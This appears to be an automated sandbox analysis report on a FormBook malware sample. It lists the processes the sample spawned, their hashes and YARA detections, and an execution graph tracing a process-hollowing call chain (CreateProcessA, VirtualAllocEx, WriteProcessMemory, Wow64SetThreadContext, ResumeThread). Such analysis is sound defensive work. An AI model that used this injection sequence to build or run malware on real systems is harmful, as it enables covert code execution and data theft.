                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3935959813.0000000003090000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:7
                                                                  Start time:19:21:14
                                                                  Start date:10/01/2025
                                                                  Path:C:\Windows\SysWOW64\regini.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\SysWOW64\regini.exe"
                                                                  Imagebase:0x7d0000
                                                                  File size:41'472 bytes
                                                                  MD5 hash:C99C3BB423097FCF4990539FC1ED60E3
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3935912832.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3935958759.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:moderate
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:9
                                                                  Start time:19:21:27
                                                                  Start date:10/01/2025
                                                                  Path:C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe"
                                                                  Imagebase:0x700000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3937654032.0000000004CA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:10
                                                                  Start time:19:21:40
                                                                  Start date:10/01/2025
                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                  Imagebase:0x7ff79f9e0000
                                                                  File size:676'768 bytes
                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:10.7%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:219
                                                                    Total number of Limit Nodes:21
                                                                    execution_graph 41507 69af408 41509 69af41d 41507->41509 41511 69af4d7 41509->41511 41512 69a6468 41509->41512 41510 69af4ac 41513 69a648c 41512->41513 41514 69a6493 41512->41514 41513->41510 41518 69a64ba 41514->41518 41519 69a4eac 41514->41519 41517 69a4eac GetCurrentThreadId 41517->41518 41518->41510 41520 69a4eb7 41519->41520 41521 69a67cf GetCurrentThreadId 41520->41521 41522 69a64b0 41520->41522 41521->41522 41522->41517 41530 bcd4f8 41531 bcd53e GetCurrentProcess 41530->41531 41533 bcd589 41531->41533 41534 bcd590 GetCurrentThread 41531->41534 41533->41534 41535 bcd5cd GetCurrentProcess 41534->41535 41536 bcd5c6 41534->41536 41537 bcd603 41535->41537 41536->41535 41538 bcd62b GetCurrentThreadId 41537->41538 41539 bcd65c 41538->41539 41549 bc4668 41550 bc467a 41549->41550 41552 bc4686 41550->41552 41553 bc4778 41550->41553 41554 bc479d 41553->41554 41558 bc4888 41554->41558 41562 bc4878 41554->41562 41560 bc48af 41558->41560 41559 bc498c 41559->41559 41560->41559 41566 bc44e0 41560->41566 41564 bc48af 41562->41564 41563 bc498c 41563->41563 41564->41563 41565 bc44e0 CreateActCtxA 41564->41565 41565->41563 41567 bc5918 CreateActCtxA 41566->41567 41569 bc59db 41567->41569 41570 7275d5f 41574 72764f0 41570->41574 41597 72764ef 41570->41597 41571 7275d69 41575 727650a 41574->41575 41579 727652e 41575->41579 41620 7276926 41575->41620 41625 7276bf9 41575->41625 41630 727745a 41575->41630 41635 7276d7f 41575->41635 41640 7276a5f 41575->41640 41647 7276c10 41575->41647 41651 7276b30 41575->41651 41656 7276a71 41575->41656 41661 727690a 41575->41661 41666 727720b 41575->41666 41673 727698c 41575->41673 41678 727724e 41575->41678 41683 7276aee 41575->41683 41690 72769ae 41575->41690 41695 7276c80 41575->41695 41702 7276ac2 41575->41702 41707 7276d23 41575->41707 41712 7276a04 41575->41712 41719 7276a85 41575->41719 41726 7277086 41575->41726 41579->41571 41598 72764f0 41597->41598 41599 727652e 41598->41599 41600 7276926 2 API calls 41598->41600 41601 7277086 4 API calls 41598->41601 41602 7276a85 4 API calls 41598->41602 41603 7276a04 4 API calls 41598->41603 41604 7276d23 2 API calls 41598->41604 41605 7276ac2 2 API calls 41598->41605 41606 7276c80 4 API calls 41598->41606 41607 72769ae 2 API calls 41598->41607 41608 7276aee 4 API calls 41598->41608 41609 727724e 2 API calls 41598->41609 41610 727698c 2 API calls 41598->41610 41611 727720b 4 API calls 41598->41611 41612 727690a 2 API calls 41598->41612 41613 7276a71 2 API calls 41598->41613 41614 7276b30 2 API calls 41598->41614 41615 7276c10 2 API calls 41598->41615 41616 7276a5f 4 API calls 41598->41616 41617 7276d7f 2 API calls 41598->41617 41618 727745a 2 API calls 41598->41618 41619 7276bf9 2 API calls 41598->41619 41599->41571 41600->41599 41601->41599 41602->41599 41603->41599 41604->41599 41605->41599 41606->41599 41607->41599 41608->41599 41609->41599 41610->41599 41611->41599 41612->41599 41613->41599 41614->41599 41615->41599 41616->41599 41617->41599 41618->41599 41619->41599 41621 727692a 41620->41621 41735 7275744 41621->41735 41739 7275750 41621->41739 41626 7276b9b 41625->41626 41627 7276f10 41626->41627 41743 7274a47 41626->41743 41747 7274a48 41626->41747 41627->41579 41631 727690b 41630->41631 41633 7275744 CreateProcessA 41631->41633 41634 7275750 CreateProcessA 41631->41634 41632 72769e5 41632->41579 41633->41632 41634->41632 41636 7276b9b 41635->41636 41637 7276f10 41636->41637 41638 7274a47 ResumeThread 41636->41638 41639 7274a48 ResumeThread 41636->41639 41637->41579 41638->41636 41639->41636 41641 7276a04 41640->41641 41642 72771a9 41641->41642 41751 72750c0 41641->41751 41755 72750c8 41641->41755 41759 72751b1 41641->41759 41763 72751b8 41641->41763 41642->41579 41649 72750c0 WriteProcessMemory 41647->41649 41650 72750c8 WriteProcessMemory 41647->41650 41648 7276c3e 41648->41579 41649->41648 41650->41648 41652 7276b36 41651->41652 41653 7276f10 41652->41653 41654 7274a47 ResumeThread 41652->41654 41655 7274a48 ResumeThread 41652->41655 41653->41579 41654->41652 41655->41652 41657 72773a9 41656->41657 41767 7275007 41657->41767 41771 7275008 41657->41771 41658 7277384 41658->41579 41662 727692a 41661->41662 41664 7275744 CreateProcessA 41662->41664 41665 7275750 CreateProcessA 41662->41665 41663 72769e5 41663->41579 41663->41663 41664->41663 41665->41663 41667 7276a04 41666->41667 41668 72771a9 41667->41668 41669 72751b1 ReadProcessMemory 41667->41669 41670 72751b8 ReadProcessMemory 41667->41670 41671 72750c0 WriteProcessMemory 41667->41671 41672 72750c8 WriteProcessMemory 41667->41672 41668->41579 41669->41667 41670->41667 41671->41667 41672->41667 41674 727690b 41673->41674 41676 7275744 CreateProcessA 41674->41676 41677 7275750 CreateProcessA 41674->41677 41675 72769e5 41675->41579 41676->41675 41677->41675 41679 72772a4 41678->41679 41680 7276fa4 41678->41680 41679->41680 41681 72750c0 WriteProcessMemory 41679->41681 41682 72750c8 WriteProcessMemory 41679->41682 41680->41579 41681->41680 41682->41680 41775 7274f30 41683->41775 41779 7274f2f 41683->41779 41684 7276b0d 41685 7276f10 41684->41685 41688 7274a47 ResumeThread 41684->41688 41689 7274a48 ResumeThread 41684->41689 41685->41579 41688->41684 41689->41684 41691 72769b4 41690->41691 41692 72769e5 41691->41692 41693 7275744 CreateProcessA 41691->41693 41694 7275750 CreateProcessA 41691->41694 41692->41579 41692->41692 41693->41692 41694->41692 41700 72750c0 WriteProcessMemory 41695->41700 41701 72750c8 WriteProcessMemory 41695->41701 41696 7276a04 41696->41695 41697 72771a9 41696->41697 41698 72751b1 ReadProcessMemory 41696->41698 41699 72751b8 ReadProcessMemory 41696->41699 41697->41579 41698->41696 41699->41696 41700->41696 41701->41696 41703 7276ad9 41702->41703 41705 72750c0 WriteProcessMemory 41703->41705 41706 72750c8 WriteProcessMemory 41703->41706 41704 7276fa4 41704->41579 41705->41704 41706->41704 41708 727704c 41707->41708 41710 7274f30 Wow64SetThreadContext 41708->41710 41711 7274f2f Wow64SetThreadContext 41708->41711 41709 7276ff9 41710->41709 41711->41709 41713 7276a0d 41712->41713 41713->41712 41714 72771a9 41713->41714 41715 72751b1 ReadProcessMemory 41713->41715 41716 72751b8 ReadProcessMemory 41713->41716 41717 72750c0 WriteProcessMemory 41713->41717 41718 72750c8 WriteProcessMemory 41713->41718 41714->41579 41715->41713 41716->41713 41717->41713 41718->41713 41720 7276a04 41719->41720 41721 72771a9 41720->41721 41722 72751b1 ReadProcessMemory 41720->41722 41723 72751b8 ReadProcessMemory 41720->41723 41724 72750c0 WriteProcessMemory 41720->41724 41725 72750c8 WriteProcessMemory 41720->41725 41721->41579 41722->41720 41723->41720 41724->41720 41725->41720 41727 7276af2 41726->41727 41728 7277101 41727->41728 41729 7276b0d 41727->41729 41731 7274f30 Wow64SetThreadContext 41727->41731 41732 7274f2f Wow64SetThreadContext 41727->41732 41730 7276f10 41729->41730 41733 7274a47 ResumeThread 41729->41733 41734 7274a48 ResumeThread 41729->41734 41730->41579 41731->41729 41732->41729 41733->41729 41734->41729 41736 7275750 CreateProcessA 41735->41736 41738 727599b 41736->41738 41740 72757d9 CreateProcessA 41739->41740 41742 727599b 41740->41742 41744 7274a48 ResumeThread 41743->41744 41746 7274ab0 41744->41746 41746->41626 41748 7274a88 ResumeThread 41747->41748 41750 7274ab0 41748->41750 41750->41626 41752 72750c8 WriteProcessMemory 41751->41752 41754 7275167 41752->41754 41754->41641 41756 7275110 WriteProcessMemory 41755->41756 41758 7275167 41756->41758 41758->41641 41760 72751b8 ReadProcessMemory 41759->41760 41762 7275247 41760->41762 41762->41641 41764 7275203 ReadProcessMemory 41763->41764 41766 7275247 41764->41766 41766->41641 41768 7275008 VirtualAllocEx 41767->41768 41770 7275085 41768->41770 41770->41658 41772 7275048 VirtualAllocEx 41771->41772 41774 7275085 41772->41774 41774->41658 41776 7274f75 Wow64SetThreadContext 41775->41776 41778 7274fbd 41776->41778 41778->41684 41780 7274f30 Wow64SetThreadContext 41779->41780 41782 7274fbd 41780->41782 41782->41684 41540 bcad70 41543 bcae59 41540->41543 41541 bcad7f 41544 bcae01 41543->41544 41548 bcae62 41543->41548 41544->41541 41545 bcae9c 41545->41541 41546 bcb0a0 GetModuleHandleW 41547 bcb0cd 41546->41547 41547->41541 41548->41545 41548->41546 41783 bcd740 DuplicateHandle 41784 bcd7d6 41783->41784 41523 7277808 41524 727782e 41523->41524 41525 7277993 41523->41525 41524->41525 41527 72753e8 41524->41527 41528 7277a88 PostMessageW 41527->41528 41529 7277af4 41528->41529 41529->41524

                                                                    Executed Functions

                                                                    Function 00BC4218 Relevance: .1, Instructions: 122COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238564786.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bc0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b7111c178ddcafefde66e4519ad136ce42c0f1d9808ff84ba554170cdf9f88b1
                                                                    • Instruction ID: b380b82e4cd4b2fb6219b50ba8525bbdbad1c8f55dc99636dd3bef9df32aab76
                                                                    • Opcode Fuzzy Hash: b7111c178ddcafefde66e4519ad136ce42c0f1d9808ff84ba554170cdf9f88b1
                                                                    • Instruction Fuzzy Hash: FC51A370E012089FCB08DFA9D8959EEFBF2FF88300F148469D419AB364DB359846CB91
                                                                    Function 00BC6F92 Relevance: .1, Instructions: 119COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238564786.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bc0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 629884b5c3351b064f59d6a0e983068fcc96b8833c91ee45d9999968244a51e6
                                                                    • Instruction ID: 0c524c6e7bb4b31f74615c9dd89c6836c60b811bfb3ee22ec407e6f50d4fe7d2
                                                                    • Opcode Fuzzy Hash: 629884b5c3351b064f59d6a0e983068fcc96b8833c91ee45d9999968244a51e6
                                                                    • Instruction Fuzzy Hash: D851B470E012099FDB08DFA9D851AEEFBF2FF88300F148469D415AB364DB349846CB50
                                                                    Function 00BCD4E8 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 337 bcd4e8-bcd587 GetCurrentProcess 341 bcd589-bcd58f 337->341 342 bcd590-bcd5c4 GetCurrentThread 337->342 341->342 343 bcd5cd-bcd601 GetCurrentProcess 342->343 344 bcd5c6-bcd5cc 342->344 346 bcd60a-bcd625 call bcd6c8 343->346 347 bcd603-bcd609 343->347 344->343 350 bcd62b-bcd65a GetCurrentThreadId 346->350 347->346 351 bcd65c-bcd662 350->351 352 bcd663-bcd6c5 350->352 351->352
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 00BCD576
                                                                    • GetCurrentThread.KERNEL32 ref: 00BCD5B3
                                                                    • GetCurrentProcess.KERNEL32 ref: 00BCD5F0
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00BCD649
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238564786.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bc0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2063062207-0
                                                                    • Opcode ID: fce3e75a22b4ef15f5d2fba79168a2f1471eb09b98c6bd972b98f0f955277e5a
                                                                    • Instruction ID: c6c00c4972b78a88cd04eb67fcd4b24254adfb7ba6a203b357c1220205fe37ff
                                                                    • Opcode Fuzzy Hash: fce3e75a22b4ef15f5d2fba79168a2f1471eb09b98c6bd972b98f0f955277e5a
                                                                    • Instruction Fuzzy Hash: 615186B09003098FDB14DFAAD548B9EBBF5FF88304F20846DE509A73A0D779A944CB65
                                                                    Function 00BCD4F8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 359 bcd4f8-bcd587 GetCurrentProcess 363 bcd589-bcd58f 359->363 364 bcd590-bcd5c4 GetCurrentThread 359->364 363->364 365 bcd5cd-bcd601 GetCurrentProcess 364->365 366 bcd5c6-bcd5cc 364->366 368 bcd60a-bcd625 call bcd6c8 365->368 369 bcd603-bcd609 365->369 366->365 372 bcd62b-bcd65a GetCurrentThreadId 368->372 369->368 373 bcd65c-bcd662 372->373 374 bcd663-bcd6c5 372->374 373->374
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 00BCD576
                                                                    • GetCurrentThread.KERNEL32 ref: 00BCD5B3
                                                                    • GetCurrentProcess.KERNEL32 ref: 00BCD5F0
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00BCD649
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238564786.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bc0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2063062207-0
                                                                    • Opcode ID: 731daa05fd58911944a93483c427d444950cbe2458013e34c28ad77d8ad26e6f
                                                                    • Instruction ID: ca021bedd6259db7ff6edab3db6c75540093944c8c9bbe5d261247f8e53b767e
                                                                    • Opcode Fuzzy Hash: 731daa05fd58911944a93483c427d444950cbe2458013e34c28ad77d8ad26e6f
                                                                    • Instruction Fuzzy Hash: 955157B09003098FDB14DFA9D548B9EBBF5FF88304F20846DE409A73A0D779A944CB65
                                                                    Function 07275744 Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07275986
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID:
                                                                    • API String ID: 963392458-0
                                                                    • Opcode ID: 45deefe56dedc25a09af1432f76e25fcc8f2779d18bce835cf1f6b9082a24527
                                                                    • Instruction ID: 470a6c7e9eaab58e411dfdffcb3513714d29d8610602a04aaeddfb0d687fc0ab
                                                                    • Opcode Fuzzy Hash: 45deefe56dedc25a09af1432f76e25fcc8f2779d18bce835cf1f6b9082a24527
                                                                    • Instruction Fuzzy Hash: 11A16BB1D1021ACFDB14DF69C9417DEBBB2BF44310F1485AAE809A7240DB749995CF92
                                                                    Function 07275750 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07275986
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID:
                                                                    • API String ID: 963392458-0
                                                                    • Opcode ID: 56257b083b825b599b160095857e4b40221d81594a044345ee639ee4151a7880
                                                                    • Instruction ID: a8c80dc08dea1af47b7c1629ddc87d68a41d6d3fdfaca6b38859e00174675ff6
                                                                    • Opcode Fuzzy Hash: 56257b083b825b599b160095857e4b40221d81594a044345ee639ee4151a7880
                                                                    • Instruction Fuzzy Hash: 40915BB1D1021ACFDB14DF69C98179DFBB2BF48310F1485AAD809A7240DB749995CF92
                                                                    Function 00BCAE59 Relevance: 1.7, APIs: 1, Instructions: 225COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00BCB0BE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238564786.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bc0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: c87ef8434f2169eb7bff1eec94cd811a5a3080086a6238907b51aee8c571569d
                                                                    • Instruction ID: f74da24bae35e3d47432fcfa771a548175acd68ce15cd2f8eae93eedfb1cfdef
                                                                    • Opcode Fuzzy Hash: c87ef8434f2169eb7bff1eec94cd811a5a3080086a6238907b51aee8c571569d
                                                                    • Instruction Fuzzy Hash: C2918CB0A00B498FD724CF29D454B9ABBF5FF84308F10896DD486DBA50D775E90ACB92
                                                                    Function 00BC5A84 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238564786.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bc0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e91946e7dfaf799af2ea831278a727d0c31dee04174bcebb8419b3b5ba708402
                                                                    • Instruction ID: 424f1438cc84362890ab0031e92d80f5309a35dd0d861e1c6b71f77f45cb02ca
                                                                    • Opcode Fuzzy Hash: e91946e7dfaf799af2ea831278a727d0c31dee04174bcebb8419b3b5ba708402
                                                                    • Instruction Fuzzy Hash: 3031AE71804A49CFDB21CFA9C884BEDBBF0EF56314F1481CAD055AB291C7B5A986CF51
                                                                    Function 00BC590D Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 00BC59C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238564786.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bc0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: b1861ac42c456b7e6337d8caba6b913f86c80a4d0233a84ee631b9080fcaafc8
                                                                    • Instruction ID: b276e1609ccd5800ae8ac82dc0b0402cf8f263b186d24a15616fa1945c0cacd7
                                                                    • Opcode Fuzzy Hash: b1861ac42c456b7e6337d8caba6b913f86c80a4d0233a84ee631b9080fcaafc8
                                                                    • Instruction Fuzzy Hash: E241F2B0C00619CBDB24DFAAC884B8DBBF5FF49304F20806AD418AB251DB756986CF90
                                                                    Function 00BC44E0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 00BC59C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238564786.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bc0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: d81dcd7acfa82def311bef02b22463341a31e122b33f193dec0a841c6239f824
                                                                    • Instruction ID: aae78636e0d91669dec6f3c3877a4b7f5498acc6d964cfa42ace2d43e20281a6
                                                                    • Opcode Fuzzy Hash: d81dcd7acfa82def311bef02b22463341a31e122b33f193dec0a841c6239f824
                                                                    • Instruction Fuzzy Hash: 8241D4B0C0061DCBDB24DFAAC884B9DBBF5FF49304F24815AD418AB255DB756985CF90
                                                                    Function 072750C0 Relevance: 1.6, APIs: 1, Instructions: 75injectionCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07275158
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessWrite
                                                                    • String ID:
                                                                    • API String ID: 3559483778-0
                                                                    • Opcode ID: d0b1df5029e59e016b0980cb2b56956cb120ccb4ce5d64b5b94f23cc6a48abe2
                                                                    • Instruction ID: dd6ed384ddc466bf2c6e10215ee092f6b4e0d10b3e86472746ac355c5b5107cf
                                                                    • Opcode Fuzzy Hash: d0b1df5029e59e016b0980cb2b56956cb120ccb4ce5d64b5b94f23cc6a48abe2
                                                                    • Instruction Fuzzy Hash: 02215AB19003599FCB10DFAAC985BDEBBF5FF48310F10882AE919A7240C7789954CBA0
                                                                    Function 072750C8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07275158
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessWrite
                                                                    • String ID:
                                                                    • API String ID: 3559483778-0
                                                                    • Opcode ID: cc349088c065f5da9d10c03a979568c63657c178c01574e5773b98fde74a1940
                                                                    • Instruction ID: 5950dfa393376aa500f48f15c85b4fb4cfdc76dfd8d8f4a52934c5ed7b36ba5a
                                                                    • Opcode Fuzzy Hash: cc349088c065f5da9d10c03a979568c63657c178c01574e5773b98fde74a1940
                                                                    • Instruction Fuzzy Hash: 9E2139B19003599FCB10DFAAC985BEEFBF5FF48310F10842AE919A7240D7789954CBA0
                                                                    Function 072751B1 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07275238
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessRead
                                                                    • String ID:
                                                                    • API String ID: 1726664587-0
                                                                    • Opcode ID: d093427000ae073efb4d9882e55ecd6b8837976adf8c2790af12a1c63e81384c
                                                                    • Instruction ID: cf85191df139e817c91a4452d3eb2d7dbdc31c3395b03e03cf0cf627c8cc8433
                                                                    • Opcode Fuzzy Hash: d093427000ae073efb4d9882e55ecd6b8837976adf8c2790af12a1c63e81384c
                                                                    • Instruction Fuzzy Hash: 37213AB1C003599FCB10DFAAD945AEEFBF5FF48320F50842AE919A7250C7799941CBA1
                                                                    Function 00BCD738 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00BCD7C7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238564786.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bc0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 1ddd071c1cb4bb2329fe143d57ff8c3e53686a8fc93c3f7d6ac462c2eebb3fa8
                                                                    • Instruction ID: 09a17cc71f2389590b51bdd2b21c9daacdfa106cae1dddbdf48b2057faf0a929
                                                                    • Opcode Fuzzy Hash: 1ddd071c1cb4bb2329fe143d57ff8c3e53686a8fc93c3f7d6ac462c2eebb3fa8
                                                                    • Instruction Fuzzy Hash: 532125B58012489FDB10CFAAD984ADEFFF4FB49310F14801AE958A3310C378AA40CFA0
                                                                    Function 07274F2F Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07274FAE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: ContextThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 983334009-0
                                                                    • Opcode ID: aff5b8f38afeb60b5763edda004261f975351d32eeb3e84eb1e220ee73a865ba
                                                                    • Instruction ID: 5ceb6e5397339f7b58f5222b5951400cf7afcbb83dd520f1a0f26e63f6925a53
                                                                    • Opcode Fuzzy Hash: aff5b8f38afeb60b5763edda004261f975351d32eeb3e84eb1e220ee73a865ba
